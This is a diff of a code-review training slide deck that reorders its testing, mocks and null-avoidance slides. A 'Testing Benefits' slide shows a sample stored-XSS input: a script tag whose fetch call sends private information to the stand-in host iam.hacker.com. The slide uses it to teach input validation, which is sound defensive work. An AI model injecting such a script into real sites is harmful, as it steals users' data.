--- a/code_review.pptx
+++ b/code_review.pptx
@@ -13,11 +13,12 @@
     <p:sldId id="263" r:id="rId7"/>
     <p:sldId id="262" r:id="rId8"/>
     <p:sldId id="264" r:id="rId9"/>
-    <p:sldId id="266" r:id="rId10"/>
-    <p:sldId id="267" r:id="rId11"/>
-    <p:sldId id="268" r:id="rId12"/>
-    <p:sldId id="269" r:id="rId13"/>
-    <p:sldId id="270" r:id="rId14"/>
+    <p:sldId id="271" r:id="rId10"/>
+    <p:sldId id="266" r:id="rId11"/>
+    <p:sldId id="267" r:id="rId12"/>
+    <p:sldId id="268" r:id="rId13"/>
+    <p:sldId id="269" r:id="rId14"/>
+    <p:sldId id="270" r:id="rId15"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -4429,7 +4430,7 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="3567023" y="783134"/>
+            <a:off x="3797458" y="783134"/>
             <a:ext cx="5057954" cy="948662"/>
           </a:xfrm>
         </p:spPr>
@@ -4437,9 +4438,10 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Testing Benefits</a:t>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Testing</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4463,178 +4465,69 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="1344057" y="1731796"/>
-            <a:ext cx="9964757" cy="4343070"/>
+            <a:ext cx="9964757" cy="3394407"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="457200" indent="-457200">
-              <a:buFont typeface="+mj-lt"/>
-              <a:buAutoNum type="arabicPeriod"/>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Defective code,</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="457200" indent="-457200">
-              <a:buFont typeface="+mj-lt"/>
-              <a:buAutoNum type="arabicPeriod"/>
+              <a:t>1. In general, write Test-driven Development code, because it helps to ensure the SOLID principles.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Fool-proofing (no offence), Look there is even a definition in the dictionary!</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="457200" lvl="1" indent="-457200">
-              <a:buFont typeface="+mj-lt"/>
-              <a:buAutoNum type="arabicPeriod"/>
+              <a:t>2. Write as many edge-cases as possible.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>https://</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>www.merriam-webster.com</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>/dictionary/foolproof</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="457200" indent="-457200">
-              <a:buFont typeface="+mj-lt"/>
-              <a:buAutoNum type="arabicPeriod"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Security holes</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="457200" indent="-457200">
-              <a:buFont typeface="+mj-lt"/>
-              <a:buAutoNum type="arabicPeriod"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Performance</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="457200" indent="-457200">
-              <a:buFont typeface="+mj-lt"/>
-              <a:buAutoNum type="arabicPeriod"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Legibility</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="457200" indent="-457200">
-              <a:buFont typeface="+mj-lt"/>
-              <a:buAutoNum type="arabicPeriod"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ensures against bad input</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>- Input that is too long. Does it crash the database?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>- What happens if blank input is sent?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>- What happens if UTF-8 is enabled and we send a weird character?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:buFontTx/>
-              <a:buChar char="-"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>What happens if the user writes this input into the database:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
+              <a:t>3. Use the </a:t>
+            </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0">
                 <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
               </a:rPr>
-              <a:t>&lt;script </a:t>
+              <a:t>@</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1">
                 <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
               </a:rPr>
-              <a:t>crossorigin</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>&gt;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>  fetch("https://</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>iam.hacker.com</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>", { "info": "all your private information" }); </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>&lt;/script&gt;</a:t>
+              <a:t>ParameterizedTest</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> annotation in </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0"/>
+              <a:t>JUnit 5</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, https://</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>junit.org</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>/junit5/docs/current/user-guide/#writing-tests-parameterized-tests</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4642,7 +4535,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3688686548"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2694085461"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -4687,7 +4580,7 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="3797458" y="783134"/>
+            <a:off x="3567023" y="783134"/>
             <a:ext cx="5057954" cy="948662"/>
           </a:xfrm>
         </p:spPr>
@@ -4695,10 +4588,9 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:pPr algn="ctr"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Mocks</a:t>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Testing Benefits</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4727,7 +4619,7 @@
         </p:spPr>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit/>
+            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
@@ -4737,15 +4629,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Mocks can be used to change the </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>behaviour</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> of the codebase</a:t>
+              <a:t>Defective code,</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -4755,7 +4639,25 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Unfortunately, some tests need mocks because they are tied to an external system such as HTTP requests or a database. Using mocks can help bypass the code that uses the external system.</a:t>
+              <a:t>Fool-proofing (no offence), Look there is even a definition in the dictionary!</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" lvl="1" indent="-457200">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>https://</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>www.merriam-webster.com</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>/dictionary/foolproof</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -4765,7 +4667,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>I am not a proponent of mocks because they can trick you into believing your code works.</a:t>
+              <a:t>Security holes</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -4775,15 +4677,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>In AEM we use Mockito, https://</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>site.mockito.org</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>/</a:t>
+              <a:t>Performance</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -4793,15 +4687,105 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>In JavaScript/TypeScript we use Jest, https://</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>jestjs.io</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>/</a:t>
+              <a:t>Legibility</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" indent="-457200">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ensures against bad input</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>- Input that is too long. Does it crash the database?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>- What happens if blank input is sent?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>- What happens if UTF-8 is enabled and we send a weird character?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:buFontTx/>
+              <a:buChar char="-"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>What happens if the user writes this input into the database:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>&lt;script </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>crossorigin</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>&gt;</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>  fetch("https://</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>iam.hacker.com</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>", { "info": "all your private information" }); </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>&lt;/script&gt;</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4809,7 +4793,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2783818960"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3688686548"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -4841,6 +4825,173 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B680625F-1D3E-684E-9A97-99AF2D9D74A3}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3797458" y="783134"/>
+            <a:ext cx="5057954" cy="948662"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Mocks</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B84D27A-B095-AC4F-9924-F39C410D75A4}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1344057" y="1731796"/>
+            <a:ext cx="9964757" cy="4343070"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="457200" indent="-457200">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Mocks can be used to change the </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>behaviour</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> of the codebase</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" indent="-457200">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Unfortunately, some tests need mocks because they are tied to an external system such as HTTP requests or a database. Using mocks can help bypass the code that uses the external system.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" indent="-457200">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>I am not a proponent of mocks because they can trick you into believing your code works.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" indent="-457200">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>In AEM we use Mockito, https://</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>site.mockito.org</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>/</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" indent="-457200">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>In JavaScript/TypeScript we use Jest, https://</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>jestjs.io</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>/</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2783818960"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide13.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                 <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABFA6D66-A71E-5840-BBCE-2141326B5BF1}"/>
               </a:ext>
             </a:extLst>
@@ -4948,7 +5099,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide13.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide14.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -6780,7 +6931,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B680625F-1D3E-684E-9A97-99AF2D9D74A3}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84E40A94-D9F6-2D4F-9038-06DF5570F009}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -6791,106 +6942,135 @@
             <p:ph type="title"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="3797458" y="783134"/>
-            <a:ext cx="5057954" cy="948662"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Testing</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B84D27A-B095-AC4F-9924-F39C410D75A4}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1344057" y="1731796"/>
-            <a:ext cx="9964757" cy="3394407"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>1. In general, write Test-driven Development code, because it helps to ensure the SOLID principles.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>2. Write as many edge-cases as possible.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>3. Use the </a:t>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="90000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Avoid </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0">
                 <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
               </a:rPr>
-              <a:t>@</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
+              <a:t>null</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>!</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0"/>
+            </a:br>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Unless you are using Java</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{856A38F2-763E-3440-8BEE-33884C645D91}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Just avoid </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
                 <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
               </a:rPr>
-              <a:t>ParameterizedTest</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> annotation in </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" b="1" dirty="0"/>
-              <a:t>JUnit 5</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, https://</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>junit.org</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>/junit5/docs/current/user-guide/#writing-tests-parameterized-tests</a:t>
+              <a:t>null</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Please avoid </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>null</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Instead, write a nullable-version of the code that responds to the same methods, but returns sensible values, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>https://en.wikipedia.org/wiki/Null_object_pattern</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>I know, I know. Java programmers love </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>null</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>But still, please avoid </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>null</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> in other programming languages.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6898,7 +7078,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2694085461"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4011055160"/>
       </p:ext>
     </p:extLst>
   </p:cSld>

--- a/code_review.pptx
+++ b/code_review.pptx
@@ -117,6 +117,11 @@
       </a:defRPr>
     </a:lvl9pPr>
   </p:defaultTextStyle>
+  <p:extLst>
+    <p:ext uri="{EFAFB233-063F-42B5-8137-9DF3F51BA10A}">
